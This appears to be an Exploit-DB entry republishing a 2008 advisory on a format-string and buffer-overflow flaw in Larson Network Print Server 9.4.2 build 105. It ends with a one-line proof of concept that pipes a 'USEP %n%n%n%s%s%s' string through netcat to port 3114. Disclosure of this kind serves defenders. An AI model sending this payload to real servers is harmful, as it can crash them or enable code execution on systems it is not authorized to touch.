Larson Network Print Server 9.4.2 build 105 - 'LstNPS' Logging Function USEP Command Remote Format String

EDB-ID:

31139




Platform:

Windows

Date:

2008-02-11


source: https://www.securityfocus.com/bid/27732/info
 
Larson Software Technology Network Print Server is prone to a format-string vulnerability and a buffer-overflow vulnerability.
 
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
 
Network Print Server 9.4.2 build 105 and prior versions are affected. 

echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v